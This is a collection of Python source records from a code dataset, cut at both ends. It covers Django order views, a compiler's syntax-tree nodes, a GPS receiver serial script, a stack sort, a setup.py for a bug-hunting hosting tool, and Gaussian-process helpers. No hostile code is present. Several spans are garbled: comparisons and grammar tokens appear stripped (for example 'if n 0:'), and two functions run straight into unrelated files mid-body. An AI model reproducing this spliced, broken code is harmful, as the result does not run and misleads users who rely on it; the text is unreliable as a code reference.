% (order.file_name).encode(\"utf-8\", \"replace\")\n return response\n\n\n@authenticated_view\ndef download_order_file(request, order_id):\n order = get_order_of(request.user, order_id)\n if not order:\n return HttpResponseRedirect('/dashboard')\n\n return download_file_response(order)\n\n\n@authenticated_view\ndef delete_order(request, order_id):\n order = get_order_of(request.user, order_id)\n if not order:\n return HttpResponseRedirect('/dashboard')\n order.delete()\n return HttpResponseRedirect('/dashboard')\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437128032","text":"def toString(n,base):\n #ConverString variable is set = to a string of all possible digits and symbols for every base.\n convertString = \"0123456789ABCDEF\"\n #Base Case: if the number n is smaller than the base you are trying to convert it to, then just return it's string representation. (E.g. 8 < base 10 return \"8\")\n if n 0:\n node = stack.pop()\n parent = node.parent\n indent = [] # output indent\n while parent:\n if parent.parent and parent.indexInParent() < parent.parent.childCount() - 1:\n indent.append('| ')\n else:\n indent.append(' ')\n parent = parent.parent\n\n indent.reverse() # reserve children list in order to search from left to right\n stdout.write(''.join(indent))\n stdout.write('|----> %s\\n' % str(node))\n chilrenl = list(node.childItems)\n chilrenl.reverse()\n stack += chilrenl\n value = stdout.getvalue()\n return value\n\n def gen_location(self):\n \"\"\"\n For error promoting\n :return:\n \"\"\"\n # TODO print the whole line instead of one token\n return 'near row:%d column:%d \"%s\"'\n\n def gen_stable(self, stable):\n \"\"\"\n Append a new variable to symbol table or add a new table\n For generator symbol table and semantics analysing\n :param stable:\n :return:\n \"\"\"\n assert isinstance(stable, STable)\n return None\n\n def gen_stype(self):\n \"\"\"\n Generate the symbol type in symbol table.\n For semantics analysing.\n\n :return: **must return a list**\n \"\"\"\n return []\n\n def gen_code(self):\n \"\"\"\n Generate Intermediate Code\n :return: **must return a list**\n \"\"\"\n return []\n\n\n#####################################################\n############# for building token tree ##############\n#####################################################\n\nclass TokenNode(Node):\n def __init__(self, t):\n super(TokenNode, self).__init__(t.lexeme)\n self.token = t\n\n def __str__(self):\n return str(self.token)\n\n\nclass TokenTree(object):\n \"\"\"\n Generate Token Tree which is used in QAbstractItemModel.\n Each line is a sub tree.\n When newLine, gen a new sub tree\n When append, append a node to the bottom sub tree.\n \"\"\"\n\n def __init__(self):\n self.currentLine = 0\n self.rootNode = Node('Token Tree')\n self.bottomTree = None\n\n def newLine(self, lexeme):\n self.bottomTree = Node(lexeme)\n self.rootNode.append(self.bottomTree)\n\n def append(self, node):\n self.bottomTree.append(node)\n\n\n#############################################################\n############# Util nodes for building grammar tree #########\n#############################################################\n\n\nclass LeafNode(Node):\n \"\"\"\n A leaf node which does not have a child node.\n \"\"\"\n\n def __init__(self, token):\n super(LeafNode, self).__init__(token.cate)\n self.token = token\n\n def __str__(self):\n return '%s : \"%s\"' % (self.token.cate, self.token.lexeme)\n\n def gen_code(self):\n return self.token.lexeme\n\n def gen_location(self):\n return self.token.get_location()\n\n\nclass LiteralNode(LeafNode):\n \"\"\"\n A real or integer literal node.\n \"\"\"\n\n def __init__(self, token):\n assert isinstance(token, tokens.IntLiteral) or isinstance(token, tokens.RealLiteral)\n super(LiteralNode, self).__init__(token)\n\n def gen_stype(self):\n if isinstance(self.token, tokens.IntLiteral):\n return SType(tokens.Token_INT)\n else:\n return SType(tokens.Token_REAL)\n\n def gen_code(self):\n if self.token == tokens.Token_IntLiteral:\n return int(self.token.lexeme)\n else:\n return float(self.token.lexeme)\n\n\nclass DataTypeNode(LeafNode):\n \"\"\"\n dataType ::=( | )\n \"\"\"\n\n def __init__(self, token):\n super(DataTypeNode, self).__init__(token)\n assert token in [tokens.Token_INT, tokens.Token_REAL]\n\n def gen_stype(self):\n return SType(self.token)\n\n\nclass ArrayNode(Node):\n \"\"\"\n array ::=\t ( | )? \n \"\"\"\n\n def __init__(self, _id=None, literal=None):\n \"\"\"\n literal or id is required, unless it's in func return type or func def param type.\n \"\"\"\n super(ArrayNode, self).__init__('Array')\n assert not (_id and literal)\n\n self.size = None\n if _id:\n assert isinstance(_id, IdNode)\n self.append(_id)\n self.size = _id # size can be calculated from the _id node\n if literal:\n assert isinstance(literal, LiteralNode)\n self.append(literal)\n self.size = int(literal.token.lexeme)\n\n def gen_code(self):\n if isinstance(self.size, int):\n return self.size\n else:\n return self.size.name\n\n\nclass IdNode(LeafNode):\n def __init__(self, _id):\n assert isinstance(_id, tokens.Identifier)\n super(IdNode, self).__init__(_id)\n\n self.name = self.token.lexeme\n self.stype = None\n self.type = None\n self.arr = None\n\n def set_stype(self, stype):\n self.stype = stype\n\n def gen_stype(self):\n return self.stype\n\n def gen_symbol(self):\n return Symbol(self.name, self.gen_stype())\n\n\nclass FuncId(LeafNode):\n def __init__(self, rtype, _id, params):\n assert isinstance(rtype, ReturnTypeNode)\n assert isinstance(_id, IdNode)\n super(FuncId, self).__init__(_id.token)\n\n self.rtype = rtype\n self.name = _id.name\n self.params = params\n\n def gen_stype(self):\n return STypeFunc(self.rtype.gen_stype(), self.params.gen_stype())\n\n def gen_symbol(self):\n return Symbol(self.name, self.gen_stype())\n\n\n#####################################################\n#################### grammar nodes ##################\n#####################################################\n\nclass ExterStmtsNode(Node):\n \"\"\"\n exterStmts ::= ( declareStmt | funcDefStmt )*\n \"\"\"\n\n def __init__(self, stmt_list):\n super(ExterStmtsNode, self).__init__('ExterStmts')\n for stmt in stmt_list:\n self.append(stmt)\n\n def gen_code(self):\n codes = []\n for stmt in self.childItems:\n codes += stmt.gen_code()\n return codes\n\n\nclass FuncDefStmtNode(Node):\n \"\"\"\n funcDefStmt ::= returnType ( funcDefParamList )? innerStmts \n \"\"\"\n\n def __init__(self, rtype, _id, params, innerStmts):\n super(FuncDefStmtNode, self).__init__('FuncDefStmt')\n assert params is not None\n\n # set func_id type\n self.id = _id\n self.name = _id.name\n self.funcId = FuncId(rtype, _id, params)\n self.append(rtype)\n self.append(self.funcId)\n self.append(params)\n self.append(innerStmts)\n\n def gen_location(self):\n row, column = self.id.gen_location()\n return super(FuncDefStmtNode, self).gen_location() % (row, column, self.id.name)\n\n def gen_stable(self, stable):\n stable.symbol_append(self.funcId.gen_symbol())\n\n def def_param(self, stable):\n \"\"\"\n invoke by innerstmt to declare params in innerstmt scope\n :param stable:\n :return:\n \"\"\"\n for param in self.childAt(2).childItems:\n stable.symbol_append(Symbol(param.name, param.stype), check=False)\n\n def gen_code(self):\n codes = [Code(op='f=', arg1=Code.line + 3, tar='%s' % self.name), Code(op='j')]\n codes += self.childAt(2).gen_code()\n codes += self.childAt(3).gen_code()\n codes[1].tar = codes[len(codes) - 1].line + 1 # jump over function definition\n return codes\n\n\nclass ReturnTypeNode(Node):\n \"\"\"\n returnType ::= | dataType\n \"\"\"\n\n def __init__(self, data_type):\n \"\"\"\n :param data_type: if VOID, datatype is None\n :return:\n \"\"\"\n super(ReturnTypeNode, self).__init__('ReturnType')\n self.data_type = data_type\n\n if data_type:\n assert isinstance(data_type, DataTypeNode)\n\n self.stype = data_type.gen_stype()\n self.append(data_type)\n else:\n self.stype = SType(tokens.Token_VOID)\n\n def gen_stype(self):\n return self.stype\n\n def __str__(self):\n if not self.data_type:\n return 'ReturnType: VOID'\n else:\n return super(ReturnTypeNode, self).__str__()\n\n\nclass FuncDefParam(Node):\n \"\"\"\n funcDefParam ::= dataType \n \"\"\"\n\n def __init__(self, data_type, _id):\n super(FuncDefParam, self).__init__('FuncDefParam')\n assert isinstance(data_type, DataTypeNode)\n assert isinstance(_id, IdNode)\n\n self.append(data_type)\n self.append(_id)\n\n self.stype = data_type.gen_stype()\n self.data_type = self.stype.type\n self.name = _id.name\n\n def gen_stype(self):\n return self.stype\n\n\nclass FuncDefParamList(Node):\n \"\"\"\n funcDefParamList ::= ( funcDefParam ( funcDefParam )* | )\n \"\"\"\n\n def __init__(self, params):\n \"\"\"\n :param params: if param is void, `params` is None\n :return:\n \"\"\"\n super(FuncDefParamList, self).__init__('FuncDefParams')\n self.params = params\n if params:\n for param in params:\n assert isinstance(param, FuncDefParam)\n self.append(param)\n\n def __str__(self):\n if not self.params:\n return 'FuncDefParams: VOID'\n else:\n return super(FuncDefParamList, self).__str__()\n\n def gen_stype(self):\n \"\"\"\n Gen param stype list\n \"\"\"\n if self.childCount() == 0:\n return []\n else:\n return [param.gen_stype() for param in self.childItems]\n\n def gen_code(self):\n if self.params:\n # def and assign\n codes = [Code(op='=', arg1='_i' if self.params[i].data_type == tokens.Token_INT else '_f',\n tar='%s' % self.params[i].name)\n for i in range(len(self.params))]\n codes += [Code(op='=p', arg1='_p%d' % i, tar='%s' % self.params[i].name)\n for i in range(len(self.params))]\n return codes\n else:\n return []\n\n\nclass FuncCallExprNode(Node):\n \"\"\"\n funcCallExpr ::= ( funcCallParamList )? \n \"\"\"\n\n def __init__(self, _id, params):\n super(FuncCallExprNode, self).__init__('FuncCallExpr')\n\n self.append(_id)\n self.id = _id\n self.name = _id.name\n if params:\n self.append(params)\n self.params = params\n else:\n self.params = None\n\n def gen_location(self):\n row, column = self.id.gen_location()\n return super(FuncCallExprNode, self).gen_location() % (row, column, self.id.name)\n\n def gen_stype(self):\n return [SUnknown(self.name, is_func=True)]\n\n def gen_stable(self, stable):\n stable.invoke_func(self.name, self.params.gen_stype() if self.params else [])\n\n def gen_code(self):\n codes = self.params.gen_code() if self.params else []\n codes += [Code(op='=', arg1=Code.line + 3, tar='_ra')]\n codes.append(Code(op='c', tar='%s' % self.name))\n codes.append(Code(op='=', arg1='_rv', tar=Code.gen_temp()))\n return codes\n\n\nclass FuncCallStmtNode(Node):\n \"\"\"\n funcCallStmt ::= funcCallExpr \n \"\"\"\n\n def __init__(self, funcCallExpr):\n super(FuncCallStmtNode, self).__init__('FuncCallStmt')\n self.append(funcCallExpr)\n self.funcCall = funcCallExpr\n\n def gen_code(self):\n return self.funcCall.gen_code()\n\n\nclass FuncCallParamList(Node):\n \"\"\"\n funcCallParamList ::= ( expr ( expr )* | )\n \"\"\"\n\n def __init__(self, params):\n \"\"\"\n :param params: if VOID, params is None\n :return:\n \"\"\"\n super(FuncCallParamList, self).__init__('FuncCallParamList')\n if params:\n for param in params:\n assert isinstance(param, ExprNode)\n self.append(param)\n\n def gen_stype(self):\n return [expr.gen_stype() for expr in self.childItems]\n\n def gen_code(self):\n codes = []\n for i in range(self.childCount()):\n p = self.childAt(i).gen_code()\n codes += p\n codes.append(Code(op='p=', arg1=p[len(p) - 1].tar, tar='_p%d' % i))\n return codes\n\n\nclass ReturnStmtNode(Node):\n \"\"\"\n returnStmt ::= (expression)? \n \"\"\"\n\n def __init__(self, returnNode, expr=None):\n super(ReturnStmtNode, self).__init__('ReturnStmt')\n self.returnNode = returnNode # in order to gen location\n if expr:\n self.append(expr)\n\n def gen_location(self):\n row, column = self.returnNode.get_location()\n return super(ReturnStmtNode, self).gen_location() % (row, column, 'return')\n\n def gen_stable(self, stable):\n stable.invoke_return(self.childAt(0).gen_stype() if self.childCount() > 0 else None)\n\n def gen_code(self):\n if self.childCount() > 0:\n codes = self.childAt(0).gen_code()\n codes.append(Code(op='=', arg1=codes[len(codes) - 1].tar, tar='_rv'))\n codes.append(Code('r')) # Code('r', tar='_ra')\n else:\n codes = [Code(op='=', arg1='00', tar='_rv'), Code('r')] # Code('r', tar='_ra')\n return codes\n\n\nclass DeclareStmtNode(Node):\n \"\"\"\n declareStmt ::= dataType (array)? ( )* ( ( expression | arrayInit ) )?\n \"\"\"\n\n def __init__(self, data_type, id_list, arr=None, expr_or_init=None):\n \"\"\"\n In parser **must check**:\n 1. dataType compare with arrayInit type\n 2. array.size must be a literal\n 3. single ID cannot be assigned with arrayInit, array cannot be assigned with expr\n 4. literals in arrayInit must be of the same type\n 5. init list cannot be larger than array size\n \"\"\"\n super(DeclareStmtNode, self).__init__('DeclareStmt')\n assert isinstance(data_type, DataTypeNode)\n\n self.id_list = id_list\n self.assign = expr_or_init\n\n stype = data_type.gen_stype()\n if arr:\n if arr.size is None:\n raise IndexMissingError()\n self.stype = STypeArray(stype.type, arr.size)\n else:\n self.stype = stype\n\n # append to tree\n self.append(data_type)\n if arr:\n self.append(arr)\n for _id in id_list:\n assert isinstance(_id, IdNode)\n self.append(_id)\n _id.set_stype(self.stype) # set id type\n\n if expr_or_init:\n self.append(expr_or_init)\n\n def gen_location(self):\n row, column = self.id_list[0].gen_location()\n return super(DeclareStmtNode, self).gen_location() % (row, column, self.id_list[0].name)\n\n def gen_stable(self, stable):\n \"\"\"\n if arrayInit, type has been checked in parser.\n so wo just have to check * = expression,\n in other word, just compare dataType'stype with expression'stype\n \"\"\"\n for _id in self.id_list:\n stable.symbol_append(_id.gen_symbol())\n\n if self.assign:\n stable.invoke_compare([self.stype], self.assign.gen_stype())\n\n def gen_code(self):\n data_type = '_i' if self.stype.type == tokens.Token_INT else '_f'\n # pure declare\n arg1 = data_type\n arg2 = ''\n if isinstance(self.stype, STypeArray):\n arg1 = '%s[]' % arg1\n arg2 = self.stype.size\n codes = [Code(op='=', arg1=arg1, arg2=arg2, tar=_id.gen_code()) for _id in self.id_list]\n\n if self.assign: # decalre and assign\n if isinstance(self.stype, STypeArray): # array init\n literals = self.assign.literals\n size = self.stype.size\n for _id in self.id_list:\n codes.append(Code(op='=', arg1='%s[]' % data_type, arg2=size, tar=_id.gen_code()))\n for i in range(len(literals)):\n codes.append(Code(op='[]=', arg1=i, arg2=literals[i].gen_code(), tar=_id.gen_code()))\n else:\n codes += self.assign.gen_code() # inited with expr\n arg1 = codes[len(codes) - 1].tar\n codes += [Code(op='=', arg1=arg1, tar=_id.gen_code()) for _id in self.id_list]\n return codes\n\n\nclass ArrayInitNode(Node):\n \"\"\"\n arrayInit ::= ( INT_LITERAL ( INT_LITERAL)* | REAL_LITERAL( REAL_LITERAL)* ) \n \"\"\"\n\n def __init__(self, literal_list):\n \"\"\"\n int literal or real literal list.\n ** must be the same type**\n :param literal_list:\n :return:\n \"\"\"\n super(ArrayInitNode, self).__init__('ArrayInitNode')\n assert len(literal_list) > 0\n\n self.literals = literal_list\n self.size = len(literal_list)\n\n for literal in literal_list:\n self.append(literal)\n\n def gen_stype(self):\n return self.literals[0].gen_stype()\n\n\nclass InnerStmtsNode(Node):\n \"\"\"\n innerStmts ::= ( declareStmt | assignStmt | ifStmt | whileStmt | funcCallStmt | returnStmt )*\n \"\"\"\n\n def __init__(self, stmt_list):\n super(InnerStmtsNode, self).__init__('InnerStmts')\n if len(stmt_list) > 0:\n for stmt in stmt_list:\n self.append(stmt)\n\n def gen_stable(self, stable):\n table = STable()\n stable.table_append(table)\n if isinstance(self.parent, FuncDefStmtNode): # add function param list to stable\n self.parent.def_param(table)\n return table\n\n def gen_code(self):\n codes = []\n for stmt in self.childItems:\n c = stmt.gen_code()\n codes += c\n return codes\n\n\nclass IfStmtNode(Node):\n \"\"\"\n ifStmt ::= condition innerStmts \n ( innerStmts )?\n \"\"\"\n\n def __init__(self, cond, stmts1, stmts2=None):\n super(IfStmtNode, self).__init__('IfStmt')\n self.append(cond)\n self.append(stmts1)\n if stmts2:\n self.append(stmts2)\n\n def gen_code(self):\n cond = self.childAt(0).gen_code()\n stmt1 = self.childAt(1).gen_code()\n stmt2 = self.childAt(2)\n if stmt2: # backfill the jump address\n stmt2 = stmt2.gen_code()\n cond[len(cond) - 1].tar = stmt2[0].line\n else:\n stmt2 = []\n if len(stmt1) > 0:\n cond[len(cond) - 1].tar = stmt1[len(stmt1) - 1].line + 1\n else:\n cond[len(cond) - 1].tar = cond[len(cond) - 1].line + 1\n return cond + stmt1 + stmt2\n\n\nclass WhileStmtNode(Node):\n \"\"\"\n whileStmt ::=\n condition innerStmts \n \"\"\"\n\n def __init__(self, cond, stmts):\n super(WhileStmtNode, self).__init__('WhileStmt')\n self.append(cond)\n self.append(stmts)\n\n def gen_code(self):\n cond = self.childAt(0).gen_code()\n stmts = self.childAt(1).gen_code()\n cond[len(cond) - 1].tar = stmts[len(stmts) - 1].line + 2 # backfill the jump address\n return cond + stmts + [Code(op='j', tar=cond[0].line)] # go back to cond\n\n\nclass AssignStmtNode(Node):\n \"\"\"\n assignStmt ::= (array)? expression \n \"\"\"\n\n def __init__(self, _id, expr, arr=None):\n super(AssignStmtNode, self).__init__('AssignStmt')\n self.name = _id.name\n self.id = _id\n self.arr = arr\n self.expr = expr\n\n _id.brother = arr or expr\n self.append(_id)\n if arr:\n self.append(arr)\n self.append(expr)\n\n def gen_location(self):\n row, column = self.id.gen_location()\n return super(AssignStmtNode, self).gen_location() % (row, column, self.id.name)\n\n def gen_stable(self, stable):\n if self.arr and (self.arr.size is None):\n raise IndexMissingError()\n stable.invoke_assign(self.name, self.expr.gen_stype(), is_arr=True if self.arr else False)\n\n def gen_code(self):\n codes = self.expr.gen_code()\n arg = codes[len(codes) - 1].tar\n if self.arr:\n code = Code(op='[]=', arg1=self.arr.gen_code(), arg2=arg, tar=self.name)\n else:\n code = Code(op='=', arg1=arg, tar=self.name)\n codes.append(code)\n return codes\n\n\nclass ConditionNode(Node):\n \"\"\"\n condition\t::=\texpression compOp expression\n \"\"\"\n\n def __init__(self, expr1, compOp, expr2):\n super(ConditionNode, self).__init__('Condition')\n self.append(expr1)\n self.append(compOp)\n self.append(expr2)\n\n def gen_location(self):\n row, column = self.childAt(1).gen_location()\n return super(ConditionNode, self).gen_location() % (row, column, self.childAt(1).name)\n\n def gen_stable(self, stable):\n stable.invoke_compare(self.childAt(0).gen_stype(), self.childAt(2).gen_stype())\n\n def gen_code(self):\n codes = []\n arg1 = self.childAt(0).gen_code()\n op = self.childAt(1).gen_code()\n arg2 = self.childAt(2).gen_code()\n\n codes += arg1\n codes += arg2\n link = Code(op=op, arg1=arg1[len(arg1) - 1].tar,\n arg2=arg2[len(arg2) - 1].tar, tar=-1) # unknown jump target, so set -1\n codes.append(link)\n return codes\n\n\nclass ExprNode(Node):\n \"\"\"\n expression ::=\tterm (addOp term)*\n \"\"\"\n\n def __init__(self, term, addOp_term_list=None):\n super(ExprNode, self).__init__('Expression')\n self.append(term)\n if addOp_term_list:\n for pair in addOp_term_list:\n self.append(pair[0])\n self.append(pair[1])\n\n def gen_stype(self):\n stypes = []\n for i in range(0, self.childCount(), 2):\n stypes += self.childAt(i).gen_stype()\n return stypes\n\n def gen_code(self):\n codes = self.childAt(0).gen_code()\n for i in range(1, self.childCount() - 1, 2):\n op = self.childAt(i).gen_code()\n arg2 = self.childAt(i + 1).gen_code()\n\n arg1 = codes[len(codes) - 1].tar\n codes += arg2\n codes.append(Code(op=op, arg1=arg1, arg2=arg2[len(arg2) - 1].tar, tar=Code.gen_temp()))\n return codes\n\n\nclass TermNode(Node):\n \"\"\"\n term\t::=\tfactor (mulOp factor)*\n \"\"\"\n\n def __init__(self, factor, mulOp_factor_list=None):\n super(TermNode, self).__init__('Term')\n self.append(factor)\n if mulOp_factor_list:\n for pair in mulOp_factor_list:\n self.append(pair[0])\n self.append(pair[1])\n\n def gen_stype(self):\n stypes = []\n for i in range(0, self.childCount(), 2):\n stypes += self.childAt(i).gen_stype()\n return stypes\n\n def gen_code(self):\n codes = self.childAt(0).gen_code()\n for i in range(1, self.childCount() - 1, 2):\n op = self.childAt(i).gen_code()\n arg2 = self.childAt(i + 1).gen_code()\n\n arg1 = codes[len(codes) - 1].tar\n codes += arg2\n codes.append(Code(op=op, arg1=arg1, arg2=arg2[len(arg2) - 1].tar, tar=Code.gen_temp()))\n return codes\n\n\nclass FactorNode(Node):\n \"\"\"\n factor\t::= | | ( array )?\n | funcCallExpr | expression \n \"\"\"\n\n def __init__(self, literal=None, expr=None, _id=None, arr=None, funcCall=None):\n super(FactorNode, self).__init__('Factor')\n if literal:\n self.append(literal)\n elif expr:\n self.append(expr)\n elif funcCall:\n self.append(funcCall)\n else:\n self.append(_id)\n if arr:\n self.append(arr)\n\n def gen_stype(self):\n \"\"\"\n :return: a stype list\n \"\"\"\n child = self.childAt(0)\n if isinstance(child, IdNode):\n arr = self.childAt(1)\n if arr:\n if arr.size is None: # if arr, its size must exists\n raise IndexMissingError()\n return [SUnknown(child.name, True)]\n else:\n return [SUnknown(child.name, False)]\n elif isinstance(child, LiteralNode):\n return [child.gen_stype()]\n else:\n return child.gen_stype() # expr or funcCall\n\n def gen_code(self):\n \"\"\"\n list of codes or variable name or single literal\n :return:\n \"\"\"\n child = self.childAt(0)\n if isinstance(child, IdNode):\n arr = self.childAt(1)\n if arr:\n return [Code(op='=[]', arg1=child.gen_code(), arg2=arr.gen_code(), tar=Code.gen_temp())]\n else:\n return [Code(op='=', arg1=child.gen_code(), tar=Code.gen_temp())]\n elif isinstance(child, LiteralNode):\n return [Code(op='=', arg1=child.gen_code(), tar=Code.gen_temp())]\n else:\n return child.gen_code()\n\n\nclass CompNode(Node):\n \"\"\"\n compOp ::=\t | | | \n \"\"\"\n\n def __init__(self, op):\n super(CompNode, self).__init__('Compare')\n self.append(op)\n self.name = op.token.lexeme\n\n def gen_code(self):\n return 'j' + self.childAt(0).gen_code()\n\n def gen_location(self):\n return self.childAt(0).token.get_location()\n\n\nclass AddNode(Node):\n \"\"\"\n addOp\t ::=\t | \n \"\"\"\n\n def __init__(self, op):\n super(AddNode, self).__init__('Add')\n self.append(op)\n\n def gen_code(self):\n return self.childAt(0).gen_code()\n\n\nclass MulNode(Node):\n \"\"\"\n mulOp\t ::=\t | \n \"\"\"\n\n def __init__(self, op):\n super(MulNode, self).__init__('Multiply')\n self.append(op)\n\n def gen_code(self):\n return self.childAt(0).gen_code()\n","sub_path":"cinter/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":27938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"125576317","text":"def main():\n sum = 0\n sums = set([])\n sums.add(sum)\n flag = False\n while not flag:\n file = open(\"input.txt\", \"r\", encoding=\"utf-8\")\n for row in file:\n if flag:\n break\n sum += int(row.rstrip())\n print(sum)\n set_size = len(sums)\n sums.add(sum)\n if set_size == len(sums):\n flag = True\n\n file.close()\n print(sum)\n file.close()\n\n\nmain()\n","sub_path":"Day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"334106476","text":"import serial\nimport time\nimport re\nfrom datetime import datetime\nimport sys\n\n\n\nf = open(\"POSAVE LOG.txt\", \"a\") # Make a log file\n\n\ndef readValue(ser): # Reads Novatel commands\n value=''\n char='0'\n line=''\n num=0\n while (num<6):\n # Read a line and convert it from b'xxx\\r\\n' to xxx\n char = ser.read().decode('utf-8')\n line += char\n if char == '\\r':\n num+=1\n line += ' '\n print ('DEBUG: '+line)\n return line\n\ndef readValueOK(ser): # Reads Novatel O.K commands\n value=''\n char='0'\n line=''\n num=0\n while (num<2):\n # Read a line and convert it from b'xxx\\r\\n' to xxx\n char = ser.read().decode('utf-8')\n line += char\n if char == '\\n':\n num+=1\n line += ' '\n print ('DEBUG2: '+line)\n return line\n\ndef timeSet(opt, time_value): #converts to hours and seconds. Return list - [S,H]\n\n #errors setup\n err40_400 = '\\n****************************************\\n*** Please enter number between 40-400 ***\\n****************************************\\n'\n err1_60 = '\\n****************************************\\n*** Please enter number between 1-60 ***\\n****************************************\\n'\n err01_48 = '\\n****************************************\\n*** Please enter number between 0.1-48 ***\\n****************************************\\n'\n print (\"CCCCCCCCCCCCCCCCC\")\n timeList = []\n if opt == 1:\n try:\n waitTime = float(time_value)\n if 0.1 <= waitTime <= 48:\n flag = 0\n else:\n print(err01_48)\n except ValueError:\n print(err01_48)\n pass\n f.write(str(datetime.now()) + \" \" + 'User start pos for ' + str(waitTime) + ' Hours\\n')\n timeInSecs = (waitTime * 60) * 60 # Convert time in Hours to seconds\n timeList.append(timeInSecs)\n timeList.append(waitTime)\n return timeList\n elif opt == 2:\n try:\n waitTime = float(time_value)\n if 1 <= waitTime <= 60:\n flag = 0\n else:\n print(err1_60)\n except ValueError:\n print(err1_60)\n pass\n f.write(str(datetime.now()) + \" \" + 'User start pos for ' + str(waitTime) + ' Minutes\\n')\n timeInSecs = waitTime * 60 # Convert time in Minutes to seconds\n waitTime = round(waitTime / 60, 2)\n timeList.append(timeInSecs)\n timeList.append(waitTime)\n return timeList\n elif opt == 3:\n try:\n waitTime = float(time_value)\n if 40 <= waitTime <= 400:\n flag = 0\n else:\n print(err40_400)\n except ValueError:\n print(err40_400)\n pass\n f.write(str(datetime.now()) + \" \" + 'User start pos for ' + str(waitTime) + ' Seconds\\n')\n timeInSecs = waitTime\n waitTime = round(waitTime / 60 / 60, 6)\n timeList.append(timeInSecs)\n timeList.append(waitTime)\n return timeList\n else:\n print('not good')\n\ndef start_pos(opt,time_value):\n\n f.write('\\n\\n---------------------------------------------------------------------------------\\n')\n f.write(str(datetime.now()) + \" \" + 'Script opened\\n')\n print (\"[DEBUG]: Values has been past to the script.\") #DEBUG MASSEGE\n\n with serial.Serial() as ser:\n\n ser.baudrate = 115200\n ser.port = 'COM223'\n ser.open()\n print(\"[DEBUG]: Connected to Novatel.\") # DEBUG MASSEGE\n\n print('1')\n time_list = timeSet(opt,time_value)\n print('2')\n time_in_secs=time_list[0]\n print('3')\n waitTime=time_list[1]\n print('4')\n print(waitTime)\n\n c='posave on '+str(waitTime)+' 0.5 0.5'+'\\n'\n f.write(str(datetime.now())+\" \"+'posave on '+str(waitTime)+' 0.5 0.5\\n')\n ser.write(bytes(c, encoding=\"ascii\"))\n time.sleep(time_in_secs + 1) #Wait POS time then check if finished\n ser.write(b'log bestpos\\n')\n f.write(str(datetime.now())+' log bestpos\\n')\n time.sleep(1)\n value=readValue(ser)\n print (\"gggggggggggggggggggg\")\n f.write(str(datetime.now())+\" \"+value+\"\\n\")\n if 'FIXEDPOS' in value:\n print ('success')\n ser.write(b'fix none\\n')\n time.sleep(1)\n dd=value.split(\"FIXEDPOS \",1)[1] #split until the first cordinate\n cordinates='fix position '+' '.join(dd.split()[:3])+'\\n' #get only 3 first words\n getOK=readValueOK(ser)\n print (str(getOK))\n if '= temp.peek()):\n temp.push(self.pop().value)\n else:\n minNode = self.pop()\n while(temp.peek() > minNode.value or temp.isEmpty()):\n self.push(temp.pop().value)\n temp.push(minNode.value)\n temp.ll.printList()\n while(temp.isEmpty() == False):\n self.push(temp.pop().value)\n \ns = Stack()\ns.push(4)\ns.push(2)\ns.push(8)\ns.push(9)\ns.push(1)\ns.stackSort()\ns.ll.printList()\n\n\n\n\n\n","sub_path":"Queues/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"478653562","text":"#!/usr/bin/env python\nimport os\nfrom setuptools import setup, find_packages\n\npath = os.path.dirname(__file__)\nlong_description = open(os.path.join(path, \"README.md\"), \"r\", encoding=\"utf8\").read()\n\nsetup(\n name=\"pwn-machine\",\n version=\"1.1\",\n packages=find_packages(),\n description=\"Simple self hosting solution based on docker for bug hunters.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/yeswehack/pwn-machine\",\n author=\"@BitK_\",\n author_email=\"bitk@yeswehack.com\",\n install_requires=[\n \"click==7.1.2\",\n \"dnspython==1.16.0\",\n \"docker==4.2.2\",\n \"docker-compose==1.26.2\",\n \"dockerpty==0.4.1\",\n \"docopt==0.6.2\",\n \"paramiko==2.7.1\",\n \"pyaml==20.4.0\",\n \"requests==2.24.0\",\n \"tqdm==4.47.0\",\n \"tabulate==0.8.7\",\n ],\n package_data={\"skel\": [\"*\"]},\n include_package_data=True,\n entry_points={\"console_scripts\": [\"pm=pwnmachine.cli:cli\"]},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78523125","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.special import gamma\nimport time\nfrom scipy.special import loggamma\nimport pickle\nfrom pathlib import Path\n\ndef posterior_expectation(Xs, Ys, sigma_2):\n \"\"\"\n Xs: array [X_0, X_1, ..., X_T]\n Ys: array [Y_1, Y_2, ..., Y_T]\n sigma_2: variance of noise\n \"\"\"\n m, d = Xs.shape\n Sigma = compute_covariance_matrix(Xs, sigma_2)\n Sigma_inv = np.linalg.solve(Sigma, np.eye(m))\n coeff = -1.0/Sigma_inv[m-1, m-1]\n Sigma_col = Sigma_inv[m-1,:m-1]\n return coeff * np.dot(Sigma_col, Ys)\n\ndef posterior_variance(Xs, sigma_2):\n m, d = Xs.shape\n Sigma = compute_covariance_matrix(Xs, sigma_2)\n Sigma_inv = np.linalg.solve(Sigma, np.eye(m))\n return 1.0/Sigma_inv[m-1, m-1]\n\ndef compute_covariance_matrix(Xs, sigma_2):\n \"\"\"\n Compute the covariance matrix from the kernel function.\n Xs: array [X_0, X_1, ..., X_T]\n sigma_2: variance of noise\n \"\"\"\n m, d = Xs.shape\n t1 = np.reshape(np.tile(Xs, m), (m, m, d))\n t2 = np.reshape(np.tile(Xs, (m, 1)), (m, m, d))\n K1 = np.linalg.norm(t1 - t2, axis=2)\n coeff = 0.1\n Sigma = np.ones((m, m)) - coeff*K1\n return Sigma\n\ndef compute_covariance_matrix_massive(Xs, r, coeff):\n m, d = Xs.shape\n m_div = int(m/r)+1\n\n K = []\n for k in range(r):\n m1 = k*m_div\n m2 = min((k+1)*m_div, m)\n K_ks = []\n for j in range(r):\n n1 = j*m_div\n n2 = min((j+1)*m_div, m)\n if m1 == n1:\n K_kj = compute_diag(Xs, m1, m2)\n elif m1 < n1:\n K_kj = 